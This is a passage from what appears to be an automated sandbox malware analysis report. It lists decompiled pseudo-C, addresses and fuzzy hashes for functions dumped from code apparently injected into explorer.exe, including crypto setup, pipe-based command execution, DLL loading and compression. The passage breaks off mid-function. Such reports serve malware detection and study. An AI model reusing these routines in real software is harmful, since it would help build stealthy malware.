                  0x00091742
                  0x0009174a
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                  • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                  • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                  • API String ID: 667068680-129414566
                  • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                  • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00092122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00092285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000922CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00088706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x909b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














                  0x00092125
                  0x0009212a
                  0x0009212e
                  0x0009212e
                  0x00092133
                  0x00092138
                  0x00092139
                  0x0009213c
                  0x0009213d
                  0x00092142
                  0x00092145
                  0x00092146
                  0x0009214b
                  0x00092152
                  0x000921f8
                  0x000921f8
                  0x00000000
                  0x00092161
                  0x00092161
                  0x00092168
                  0x0009216c
                  0x00092173
                  0x0009217c
                  0x0009217e
                  0x0009217e
                  0x0009217c
                  0x0009218d
                  0x000921b3
                  0x000921bc
                  0x000921be
                  0x000921c4
                  0x000921f3
                  0x000921f3
                  0x000921fb
                  0x000921fe
                  0x000921fe
                  0x000921c6
                  0x000921c7
                  0x000921cd
                  0x000921cf
                  0x000921cf
                  0x000921d4
                  0x000921d3
                  0x000921d3
                  0x000921db
                  0x000921e7
                  0x000921f1
                  0x000921f1
                  0x00000000
                  0x0009219d
                  0x0009219d
                  0x0009219d
                  0x000921a3
                  0x00000000
                  0x00000000
                  0x000921a5
                  0x000921ab
                  0x000921b0
                  0x00000000
                  0x000921b0
                  0x0009218d

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: strchr$_snprintflocaleconv
                  • String ID: %.*g
                  • API String ID: 1910550357-952554281
                  • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                  • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000902B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _snprintfqsort
                  • String ID: %I64d$false$null$true
                  • API String ID: 756996078-4285102228
                  • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                  • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                  Download Yara Rule
                  APIs
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                  • SysAllocString.OLEAUT32(?), ref: 0008D764
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                  • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                  • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000907F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$\u%04X$\u%04X\u%04X
                  • API String ID: 0-2132903582
                  • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                  • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008D523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 30%
                  			E0008D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00088604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                  0x0008d530
                  0x0008d533
                  0x0008d536
                  0x0008d547
                  0x0008d54d
                  0x0008d55e
                  0x0008d566
                  0x0008d5b7
                  0x0008d5b7
                  0x0008d5bc
                  0x0008d5c1
                  0x0008d5c1
                  0x0008d5c4
                  0x0008d5c9
                  0x0008d5ce
                  0x0008d5ce
                  0x0008d5d1
                  0x0008d568
                  0x0008d569
                  0x0008d56f
                  0x0008d580
                  0x0008d585
                  0x00000000
                  0x0008d587
                  0x0008d594
                  0x0008d59c
                  0x00000000
                  0x0008d59e
                  0x0008d5a0
                  0x0008d5a8
                  0x00000000
                  0x0008d5aa
                  0x0008d5ad
                  0x0008d5b3
                  0x0008d5b3
                  0x0008d5a8
                  0x0008d59c
                  0x0008d585
                  0x0008d5d6

                  APIs
                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                  • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                  • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                  • String ID:
                  • API String ID: 1610782348-0
                  • Opcode ID: 10b5e74f8a59f27958c0d6474d468863946cdabe288dbe1f51fb48886bb044ac
                  • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                  • Opcode Fuzzy Hash: 10b5e74f8a59f27958c0d6474d468863946cdabe288dbe1f51fb48886bb044ac
                  • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000921FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E000921FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000922CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00092291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x98250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00092291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x98258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











                  0x000921ff
                  0x00092207
                  0x0009220c
                  0x0009220f
                  0x00092214
                  0x0009221a
                  0x00092223
                  0x00092227
                  0x00092227
                  0x00092223
                  0x00092229
                  0x0009222e
                  0x00092237
                  0x0009223c
                  0x0009223f
                  0x00092248
                  0x0009224a
                  0x00092251
                  0x00092262
                  0x00092262
                  0x00092264
                  0x0009226c
                  0x00092273
                  0x00000000
                  0x0009226e
                  0x00092272
                  0x00092272
                  0x00092253
                  0x00092253
                  0x00092259
                  0x0009225b
                  0x00092260
                  0x00092276
                  0x00092279
                  0x0009227e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00092260

                  APIs
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _errno$localeconvstrchrstrtod
                  • String ID:
                  • API String ID: 1035490122-0
                  • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                  • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E0008A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E0008861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x9e684; // 0xe7f8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x9e684; // 0xe7f8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00088604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x9e684; // 0xe7f8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x9e684; // 0xe7f8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x9e684; // 0xe7f8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x9e684; // 0xe7f8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000891A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00089292(_t127);
						E0008861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0008C379(_t127));
				_t98 =  *0x9e68c; // 0xe7fab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x9e684; // 0xe7f8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x9e684; // 0xe7f8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00089256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E0008861A( &_v32, 0);
				return _t128;
			}




































                  0x0008a9c2
                  0x0008a9c4
                  0x0008a9d0
                  0x0008a9d5
                  0x0008a9d8
                  0x0008a9da
                  0x0008a9dd
                  0x0008a9e0
                  0x0008a9e7
                  0x0008a9ea
                  0x0008a9f1
                  0x0008a9f4
                  0x0008a9fe
                  0x0008a9ff
                  0x0008aa02
                  0x0008aa04
                  0x0008aa05
                  0x0008aa1c
                  0x0008ab9c
                  0x00000000
                  0x0008ab9c
                  0x0008aa33
                  0x0008ab68
                  0x0008ab6e
                  0x0008ab79
                  0x0008ab7b
                  0x0008ab83
                  0x0008ab83
                  0x0008ab8a
                  0x0008ab8c
                  0x0008ab95
                  0x0008ab95
                  0x00000000
                  0x0008ab98
                  0x0008aa39
                  0x0008aa3c
                  0x0008aa3f
                  0x0008aa45
                  0x0008aa4f
                  0x0008aa59
                  0x0008aa60
                  0x0008aa69
                  0x0008aa6b
                  0x0008aa71
                  0x00000000
                  0x00000000
                  0x0008aa7c
                  0x0008aa83
                  0x0008aa84
                  0x0008aa89
                  0x0008aa8a
                  0x0008aa8b
                  0x0008aa90
                  0x0008aa92
                  0x0008aa93
                  0x0008aa94
                  0x0008aa97
                  0x0008aa9d
                  0x00000000
                  0x00000000
                  0x0008aaa3
                  0x0008aaab
                  0x0008aaae
                  0x0008aab6
                  0x0008aab9
                  0x0008aabc
                  0x0008aac2
                  0x0008aad6
                  0x0008aadc
                  0x0008aae2
                  0x0008ab0b
                  0x0008aae4
                  0x0008aae4
                  0x0008aae6
                  0x0008aae8
                  0x0008aaf0
                  0x0008aaf8
                  0x0008aafd
                  0x0008aafd
                  0x0008ab11
                  0x0008ab13
                  0x0008ab13
                  0x0008ab1b
                  0x0008ab23
                  0x0008ab24
                  0x0008ab29
                  0x0008ab32
                  0x0008ab52
                  0x0008ab52
                  0x0008ab5a
                  0x0008ab5d
                  0x0008ab65
                  0x00000000
                  0x0008ab65
                  0x0008ab3b
                  0x0008ab3f
                  0x00000000
                  0x00000000
                  0x0008ab47
                  0x00000000

                  APIs
                  • memset.MSVCRT ref: 0008A9F4
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                  • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeapPipe$AllocateFreememset
                  • String ID: D
                  • API String ID: 2365139273-2746444292
                  • Opcode ID: 661905bd22fed7a973dcdcef03fb869a0e46d236f1e93c021d7ceb0a470df47b
                  • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                  • Opcode Fuzzy Hash: 661905bd22fed7a973dcdcef03fb869a0e46d236f1e93c021d7ceb0a470df47b
                  • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9e688; // 0xb0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000895E1(_t50, 0xb62);
					_t66 =  *0x9e688; // 0xb0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
					_t20 =  *0x9e688; // 0xb0000
					asm("sbb eax, eax");
					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x9e688; // 0xb0000
					_t68 = E000892E5(_t26 + 0x1020);
					_v12 = _t68;
					E000885D5( &_v8);
					_t32 =  *0x9e688; // 0xb0000
					_t34 = E000892E5(_t32 + 0x122a);
					 *0x9e784 = _t34;
					_t35 =  *0x9e684; // 0xe7f8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9e784);
					 *0x9e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0008E171(0x9bb48, _t60);
					}
					 *0x9e780 = _t38;
					E0008861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x9e780 != 0) {
						goto L10;
					} else {
						E0008861A(0x9e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9e780 == 0) {
						_t46 =  *0x9e6bc; // 0xe7fa18
						 *0x9e780 = _t46;
					}
					L10:
					return 1;
				}
			}


























                  0x0008c4ce
                  0x0008c4ce
                  0x0008c4ce
                  0x0008c4d1
                  0x0008c4dd
                  0x0008c4e8
                  0x0008c504
                  0x0008c509
                  0x0008c512
                  0x0008c514
                  0x0008c51c
                  0x0008c53d
                  0x0008c542
                  0x0008c54f
                  0x0008c55a
                  0x0008c561
                  0x0008c568
                  0x0008c579
                  0x0008c57f
                  0x0008c582
                  0x0008c599
                  0x0008c5a5
                  0x0008c5ad
                  0x0008c5b4
                  0x0008c5ba
                  0x0008c5c6
                  0x0008c5cc
                  0x0008c5d3
                  0x0008c5e6
                  0x0008c5d5
                  0x0008c5d5
                  0x0008c5d8
                  0x0008c5de
                  0x0008c5e3
                  0x0008c5e8
                  0x0008c5f3
                  0x0008c605
                  0x0008c617
                  0x00000000
                  0x0008c619
                  0x0008c620
                  0x00000000
                  0x0008c626
                  0x0008c627
                  0x0008c627
                  0x0008c62e
                  0x0008c630
                  0x0008c635
                  0x0008c635
                  0x0008c63a
                  0x0008c63e
                  0x0008c63e

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: LibraryLoadmemset
                  • String ID: %08x$dll
                  • API String ID: 3406617148-2963171978
                  • Opcode ID: f0f85180af92f8b6e6423e006c9d25780382a4acb783e1dccfe4a16f4333fee2
                  • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
                  • Opcode Fuzzy Hash: f0f85180af92f8b6e6423e006c9d25780382a4acb783e1dccfe4a16f4333fee2
                  • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00092D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                  Download Yara Rule
                  C-Code - Quality: 99%
                  			E00092D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00095D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00094AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
